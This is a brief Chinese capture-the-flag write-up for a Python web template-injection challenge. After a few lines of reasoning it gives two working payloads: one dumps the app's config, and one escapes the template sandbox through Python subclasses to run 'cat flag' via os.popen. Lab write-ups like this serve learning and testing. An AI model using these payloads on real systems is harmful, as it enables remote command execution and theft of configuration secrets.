天命:相信自己
一打开题目就告诉你输入flag参数,而且你输入什么就输出什么
输入:1 输出:1
很明显就是模板注入,Python的web框架独有的漏洞
那就简单,去查一下payload,一把梭
学习可以看这篇文章:https://www.cnblogs.com/tuzkizki/p/15394415.html
原理也不解释,就是拿poc一把梭
# flag在配置文件里
第一关是:flag={{config}}
# 命令执行
第二关是:flag={{"".__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__import__('os').popen('cat%20flag').read()}}